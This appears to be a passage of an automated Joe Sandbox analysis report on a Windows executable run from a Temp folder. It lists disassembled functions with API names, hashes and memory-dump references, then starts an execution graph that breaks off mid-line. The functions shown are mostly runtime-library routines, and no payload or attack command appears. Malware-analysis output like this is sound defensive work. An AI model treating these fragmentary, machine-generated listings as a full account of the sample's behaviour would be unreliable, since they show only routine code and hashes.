                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                        • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                        • Instruction ID: 3cfe055ab2e9fcabfd485b4d9a1b635b330fb8b4ef0fca23f9dce2a763d83dec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B519032E046428AFB14EF71D8503BDA3A1FB48B58F508575DE19476C8EFB8D481C7A0
                                                                                                                                                                                                                        Function 00007FF7F24F2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                        • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                        • Instruction ID: ea8a2440f696230fa8835060104cba3a7deecb789aa79b16d464c1c31daf486e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C11A322B1814242FB54EB69E5442B99292EBC8B90FC49031DA7907BCDCDEDD881CA60
                                                                                                                                                                                                                        Function 00007FF7F24FC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                        • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                        • Instruction ID: 652e953f8faf75f721f0286b3b83e3d1433dcca6835127f0a8cb39d06d560bbe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65113A22B14B058AEB00DF60E8542B873A4FB59768F841E35DA3D877E4DFBCE158C290
                                                                                                                                                                                                                        Function 00007FF7F2514E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                        • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                        • Instruction ID: e679f36f5910ab0f40dbf0c3fad864f4e0202ba6299c5fd84570d722836c228a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4441F422B1868257FB24AF25940137AE650EB80BB4F945275EE6C07BD9EFBCD481C790
                                                                                                                                                                                                                        Function 00007FF7F250832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F250835E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F24FBEC5), ref: 00007FF7F250837C
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                        • API String ID: 3580290477-841510543
                                                                                                                                                                                                                        • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                        • Instruction ID: d4dc84eea2f4ff4940494296e607084628d9083416cf6aad3d8aabb1da7a25e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C641C331A08B5386E714FF25AC454BCA3A4FF44794B855075EA6D477C5EE7CD481C3A0
                                                                                                                                                                                                                        Function 00007FF7F250F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: .$:
                                                                                                                                                                                                                        • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                        • Opcode ID: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                                                                                                                                                        • Instruction ID: 547576b3689819e1a2c5b419403e432846c8679f48bd38fe5269ffc04ed33c47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E416D22F08B5398FB10EFA19C511FC66B4AF14758F940475DE2D67AC9EFB8A442C3A0
                                                                                                                                                                                                                        Function 00007FF7F250BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                        • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                        • Instruction ID: d66c753bd67c3ce29fe024828cb699b2c1b4bfbbd72c3cd9c5bd6152d3e5b62a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2941C372B19A8281DB20EF25E8547BDA761FB88794F804031EE5E87788EFBCD441C790
                                                                                                                                                                                                                        Function 00007FF7F250E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                        • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                        • Instruction ID: f27b86e704798f82389a130de5aa1d06e24b7e0d0d38627dec309f572460d2a1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4821D222F0869282EB60EF15D84427DB3A1FB84B44FD54475DAAC436C4EFBCE945C7A0
                                                                                                                                                                                                                        Function 00007FF7F24FF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                        • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                        • Instruction ID: 9ed841dac53c28837b5746426484e7a6bbf10cb9c9c24b4abbb7826414b25f72
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90115E36618B4582EB219F15F440269B7E0FB98B94F594230DBAD07BE4DFBCC951CB40
                                                                                                                                                                                                                        Function 00007FF7F250FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                        • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                        • Instruction ID: 64be84bf5940dd69a7e166e13244df7c6532e69273f457a77ac4d7e1cd803386
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6101842191C24386FB20FF61A86127EA390EF48708FC01075D56D836D1EFBCE545CA64

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:2.4%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                        Total number of Nodes:796
                                                                                                                                                                                                                        Total number of Limit Nodes:46
                                                                                                                                                                                                                        execution_graph 55518 7ff7f2508c79 55530 7ff7f25096e8 55518->55530 55520 7ff7f2508c7e 55521 7ff7f2508cef 55520->55521 55522 7ff7f2508ca5 GetModuleHandleW 55520->55522 55523 7ff7f2508b7c 11 API calls 55521->55523 55522->55521 55527 7ff7f2508cb2 55522->55527 55524 7ff7f2508d2b 55523->55524 55525 7ff7f2508d32 55524->55525 55526 7ff7f2508d48 11 API calls 55524->55526 55528 7ff7f2508d44 55526->55528 55527->55521 55529 7ff7f2508da0 GetModuleHandleExW GetProcAddress FreeLibrary 55527->55529 55529->55521 55535 7ff7f250a460 45 API calls 3 library calls 55530->55535 55532 7ff7f25096f1 55536 7ff7f2509814 45 API calls 2 library calls 55532->55536 55535->55532 55537 7ff7f250ec9c 55538 7ff7f250ee8e 55537->55538 55540 7ff7f250ecde _isindst 55537->55540 55584 7ff7f25043f4 11 API calls _set_fmode 55538->55584 55540->55538 55543 7ff7f250ed5e _isindst 55540->55543 55558 7ff7f25154a4 55543->55558 55548 7ff7f250eeba 55594 7ff7f2509c10 IsProcessorFeaturePresent 55548->55594 55555 7ff7f250edbb 55557 7ff7f250ee7e 55555->55557 55583 7ff7f25154e8 37 API calls _isindst 55555->55583 55585 7ff7f24fb870 55557->55585 55559 7ff7f250ed7c 55558->55559 55560 7ff7f25154b3 55558->55560 55565 7ff7f25148a8 55559->55565 55598 7ff7f250f5e8 EnterCriticalSection 55560->55598 55562 7ff7f25154bb 55563 7ff7f25154cc 55562->55563 55564 7ff7f2515314 55 API calls 55562->55564 55564->55563 55566 7ff7f250ed91 55565->55566 55567 7ff7f25148b1 55565->55567 55566->55548 55571 7ff7f25148d8 55566->55571 55599 7ff7f25043f4 11 API calls _set_fmode 55567->55599 55569 7ff7f25148b6 55600 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55569->55600 55572 7ff7f25148e1 55571->55572 55574 7ff7f250eda2 55571->55574 55601 7ff7f25043f4 11 API calls _set_fmode 55572->55601 55574->55548 55577 7ff7f2514908 55574->55577 55575 7ff7f25148e6 55602 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55575->55602 55578 7ff7f2514911 55577->55578 55582 7ff7f250edb3 55577->55582 55603 7ff7f25043f4 11 API calls _set_fmode 55578->55603 55580 7ff7f2514916 55604 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55580->55604 55582->55548 55582->55555 55583->55557 55584->55557 55586 7ff7f24fb879 55585->55586 55587 7ff7f24fb884 55586->55587 55588 7ff7f24fbc00 IsProcessorFeaturePresent 55586->55588 55589 7ff7f24fbc18 55588->55589 55605 7ff7f24fbdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 55589->55605 55591 7ff7f24fbc2b 55606 7ff7f24fbbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55591->55606 55595 7ff7f2509c23 55594->55595 55607 7ff7f2509924 14 API calls 3 library calls 55595->55607 55597 7ff7f2509c3e GetCurrentProcess TerminateProcess 55599->55569 55600->55566 55601->55575 55602->55574 55603->55580 55604->55582 55605->55591 55607->55597 55608 7ff7f24f2d00 55609 7ff7f24f2d10 55608->55609 55610 7ff7f24f2d61 55609->55610 55611 7ff7f24f2d4b 55609->55611 55613 7ff7f24f2d81 55610->55613 55624 7ff7f24f2d97 __std_exception_destroy 55610->55624 55664 7ff7f24f25f0 53 API calls _log10_special 55611->55664 55665 7ff7f24f25f0 53 API calls _log10_special 55613->55665 55615 7ff7f24fb870 _log10_special 8 API calls 55617 7ff7f24f2f1a 55615->55617 55616 7ff7f24f2d57 __std_exception_destroy 55616->55615 55619 7ff7f24f3069 55672 7ff7f24f25f0 53 API calls _log10_special 55619->55672 55622 7ff7f24f3053 55671 7ff7f24f25f0 53 API calls _log10_special 55622->55671 55624->55616 55624->55619 55624->55622 55625 7ff7f24f302d 55624->55625 55627 7ff7f24f2f27 55624->55627 55636 7ff7f24f1440 55624->55636 55660 7ff7f24f1bf0 55624->55660 55670 7ff7f24f25f0 53 API calls _log10_special 55625->55670 55628 7ff7f24f2f93 55627->55628 55666 7ff7f2509714 37 API calls 2 library calls 55627->55666 55630 7ff7f24f2fb0 55628->55630 55631 7ff7f24f2fbe 55628->55631 55667 7ff7f2509714 37 API calls 2 library calls 55630->55667 55668 7ff7f24f2af0 37 API calls 55631->55668 55634 7ff7f24f2fbc 55669 7ff7f24f2470 54 API calls __std_exception_destroy 55634->55669 55673 7ff7f24f3f70 55636->55673 55639 7ff7f24f146b 55709 7ff7f24f25f0 53 API calls _log10_special 55639->55709 55640 7ff7f24f148c 55683 7ff7f24ff9f4 55640->55683 55643 7ff7f24f147b 55643->55624 55644 7ff7f24f14a1 55645 7ff7f24f14a5 55644->55645 55647 7ff7f24f14c1 55644->55647 55710 7ff7f24f2760 53 API calls 2 library calls 55645->55710 55648 7ff7f24f14f1 55647->55648 55649 7ff7f24f14d1 55647->55649 55652 7ff7f24f14f7 55648->55652 55657 7ff7f24f150a 55648->55657 55711 7ff7f24f2760 53 API calls 2 library calls 55649->55711 55687 7ff7f24f11f0 55652->55687 55653 7ff7f24f14bc __std_exception_destroy 55705 7ff7f24ff36c 55653->55705 55654 7ff7f24f1584 55654->55624 55657->55653 55658 7ff7f24f1596 55657->55658 55712 7ff7f24ff6bc 55657->55712 55715 7ff7f24f2760 53 API calls 2 library calls 55658->55715 55661 7ff7f24f1c15 55660->55661 55952 7ff7f2503ca4 55661->55952 55664->55616 55665->55616 55666->55628 55667->55634 55668->55634 55669->55616 55670->55616 55671->55616 55672->55616 55674 7ff7f24f3f7c 55673->55674 55716 7ff7f24f86b0 55674->55716 55676 7ff7f24f3fa4 55677 7ff7f24f86b0 2 API calls 55676->55677 55678 7ff7f24f3fb7 55677->55678 55721 7ff7f25052a4 55678->55721 55681 7ff7f24fb870 _log10_special 8 API calls 55682 7ff7f24f1463 55681->55682 55682->55639 55682->55640 55684 7ff7f24ffa24 55683->55684 55887 7ff7f24ff784 55684->55887 55686 7ff7f24ffa3d 55686->55644 55688 7ff7f24f1248 55687->55688 55689 7ff7f24f124f 55688->55689 55690 7ff7f24f1277 55688->55690 55904 7ff7f24f25f0 53 API calls _log10_special 55689->55904 55693 7ff7f24f1291 55690->55693 55694 7ff7f24f12ad 55690->55694 55692 7ff7f24f1262 55692->55653 55905 7ff7f24f2760 53 API calls 2 library calls 55693->55905 55696 7ff7f24f12bf 55694->55696 55703 7ff7f24f12db memcpy_s 55694->55703 55906 7ff7f24f2760 53 API calls 2 library calls 55696->55906 55698 7ff7f24ff6bc _fread_nolock 53 API calls 55698->55703 55699 7ff7f24f12a8 __std_exception_destroy 55699->55653 55700 7ff7f24f139f 55907 7ff7f24f25f0 53 API calls _log10_special 55700->55907 55703->55698 55703->55699 55703->55700 55704 7ff7f24ff430 37 API calls 55703->55704 55900 7ff7f24ffdfc 55703->55900 55704->55703 55706 7ff7f24ff39c 55705->55706 55924 7ff7f24ff148 55706->55924 55708 7ff7f24ff3b5 55708->55654 55709->55643 55710->55653 55711->55653 55936 7ff7f24ff6dc 55712->55936 55715->55653 55717 7ff7f24f86d2 MultiByteToWideChar 55716->55717 55718 7ff7f24f86f6 55716->55718 55717->55718 55720 7ff7f24f870c __std_exception_destroy 55717->55720 55719 7ff7f24f8713 MultiByteToWideChar 55718->55719 55718->55720 55719->55720 55720->55676 55722 7ff7f25051d8 55721->55722 55723 7ff7f25051fe 55722->55723 55726 7ff7f2505231 55722->55726 55752 7ff7f25043f4 11 API calls _set_fmode 55723->55752 55725 7ff7f2505203 55753 7ff7f2509bf0 37 API calls _invalid_parameter_noinfo 55725->55753 55728 7ff7f2505244 55726->55728 55729 7ff7f2505237 55726->55729 55740 7ff7f2509f38 55728->55740 55754 7ff7f25043f4 11 API calls _set_fmode 55729->55754 55730 7ff7f24f3fc6 55730->55681 55734 7ff7f2505265 55747 7ff7f250f1dc 55734->55747 55735 7ff7f2505258 55755 7ff7f25043f4 11 API calls _set_fmode 55735->55755 55738 7ff7f2505278 55756 7ff7f2504788 LeaveCriticalSection 55738->55756 55757 7ff7f250f5e8 EnterCriticalSection 55740->55757 55742 7ff7f2509f4f 55743 7ff7f2509fac 19 API calls 55742->55743 55744 7ff7f2509f5a 55743->55744 55745 